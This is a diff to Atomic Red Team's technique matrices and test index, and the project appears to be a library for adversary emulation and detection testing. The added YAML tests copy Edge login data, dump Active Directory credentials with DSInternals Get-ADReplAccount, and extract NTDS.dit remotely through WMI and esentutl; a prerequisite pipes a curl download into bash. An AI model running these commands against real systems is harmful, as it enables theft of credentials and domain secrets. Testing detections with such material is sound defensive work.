+|  | [Unix Shell](../../T1059.004/T1059.004.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Escape to Host](../../T1611/T1611.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) |  | [Video Capture](../../T1125/T1125.md) |  | [Remote Access Software](../../T1219/T1219.md) |  |
 |  | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Standard Encoding](../../T1132.001/T1132.001.md) |  |
 |  | [Visual Basic](../../T1059.005/T1059.005.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Emond](../../T1546.014/T1546.014.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -121,7 +121,7 @@
 |  |  |  |  | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rogue Domain Controller](../../T1207/T1207.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rootkit](../../T1014/T1014.md) |  |  |  |  |  |  |  |
-|  |  |  |  | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Run Virtual Instance](../../T1564.006/T1564.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rundll32](../../T1218.011/T1218.011.md) |  |  |  |  |  |  |  |
 |  |  |  |  | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -16,20 +16,20 @@
 | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [Forced Authentication](../../T1187/T1187.md) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Execution](../../T1569.002/T1569.002.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Software Deployment Tools](../../T1072/T1072.md) | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) |  | [LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Software Discovery](../../T1518/T1518.md) |  | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Visual Basic](../../T1059.005/T1059.005.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Man in the Browser [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
-|  | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Multi-hop Proxy](../../T1090.003/T1090.003.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Windows Management Instrumentation](../../T1047/T1047.md) | [Domain Account](../../T1136.002/T1136.002.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) |  | [Screen Capture](../../T1113/T1113.md) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) |  | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Standard Port](../../T1571/T1571.md) |  |
-|  |  | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) |  | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) |  | [Video Capture](../../T1125/T1125.md) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Time Discovery](../../T1124/T1124.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [External Remote Services](../../T1133/T1133.md) | Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Protocol Tunneling](../../T1572/T1572.md) |  |
@@ -60,7 +60,7 @@
 |  |  | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) |  |  |  |  |  |  |  |
-|  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  |  |  |
 |  |  | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
 |  |  | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
@@ -90,7 +90,7 @@
 |  |  |  |  | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rogue Domain Controller](../../T1207/T1207.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Run Virtual Instance](../../T1564.006/T1564.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rundll32](../../T1218.011/T1218.011.md) |  |  |  |  |  |  |  |
 |  |  |  |  | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/index.yaml

@@ -997,7 +997,7 @@ credential-access:
 
 '
         get_prereq_command: |
-          /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+          /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
           brew install hudochenkov/sshpass/sshpass
       executor:
         name: bash
@@ -1558,11 +1558,46 @@ credential-access:
       executor:
         name: powershell
         command: 'Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination
-          $env:temp -Force
+          $env:temp -Force -Recurse
 
 '
-        cleanup_command: Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction
-          Ig
+        cleanup_command: 'Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction
+          Ignore -Recurse
+
+'
+    - name: Simulating access to Windows Edge Login Data
+      auto_generated_guid: a6a5ec26-a2d1-4109-9d35-58b867689329
+      description: |
+        Simulates an adversary accessing encrypted credentials from Edge web browser's login database.
+        more info in https://www.forensicfocus.com/articles/chromium-based-microsoft-edge-from-a-forensic-point-of-view/
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Edge must be installed
+
+'
+        prereq_command: if (Test-Path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe")
+          {exit 0} else {exit 1}
+        get_prereq_command: '"Installation is not implemented as Edge is a part of
+          windows"
+
+'
+      - description: 'Edge login data file must exist
+
+'
+        prereq_command: if (Test-Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default")
+          {exit 0} else {exit 1}
+        get_prereq_command: "$edge=\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"\nStart-Process
+          $edge \nStart-Sleep -s 20\nStop-Process -Name msedge\n"
+      executor:
+        name: powershell
+        command: 'Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination
+          $env:temp\Edge -Force -Recurse
+
+'
+        cleanup_command: Remove-Item -Path "$env:temp\Edge" -Force -ErrorAction Ignore
+          -Recurse
   T1552.002:
     technique:
       created: '2020-02-04T12:58:40.678Z'
@@ -1773,6 +1808,36 @@ credential-access:
           "exit"
 
 '
+    - name: Run DSInternals Get-ADReplAccount
+      auto_generated_guid: a0bced08-3fc5-4d8b-93b7-e8344739376e
+      description: "The following Atomic will run Get-ADReplAccount from DSInternals.\nUpon
+        successful execution, domain and credentials will appear in stdout. \n[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/)
+        CrowdStrike StellerParticle.\nhttps://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        logonserver:
+          description: ComputerName argument default %logonserver%
+          type: String
+          default: $ENV:logonserver.TrimStart("\")
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'DSInternals must be installed
+
+'
+        prereq_command: |
+          $RequiredModule = Get-Module -Name DSInternals -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name DSInternals -Scope CurrentUser -Force
+
+'
+      executor:
+        command: 'Get-ADReplAccount -All -Server #{logonserver}
+
+'
+        name: powershell
+        elevation_required: false
   T1556.001:
     technique:
       external_references:
@@ -4336,6 +4401,45 @@ credential-access:
       executor:
         command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
 
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Create Volume Shadow Copy remotely (WMI) with esentutl
+      auto_generated_guid: 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
+      description: |
+        This test is intended to be run from a remote workstation with domain admin context.
+        The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
+      supported_platforms:
+      - windows
+      input_arguments:
+        source_path:
+          description: File to shadow copy
+          type: String
+          default: c:\windows\ntds\ntds.dit
+        target_path:
+          description: Target path of the result file
+          type: String
+          default: c:\ntds.dit
+        target_host:
+          description: IP Address / Hostname you want to target
+          type: String
+          default: localhost
+      dependencies:
+      - description: 'Target must be a reachable Domain Controller, and current context
+          must be domain admin
+
+'
+        prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief
+
+'
+        get_prereq_command: 'echo Sorry, can''t connect to target host, check: network,
+          firewall or permissions (must be admin on target)
+
+'
+      executor:
+        command: 'wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe
+          /y /vss #{source_path} /d #{target_path}"
+
 '
         name: command_prompt
         elevation_required: true
@@ -4505,7 +4609,7 @@ credential-access:
           -v tshark)" ]; then exit 1; else exit 0; fi;
 
 '
-        get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which
+        get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
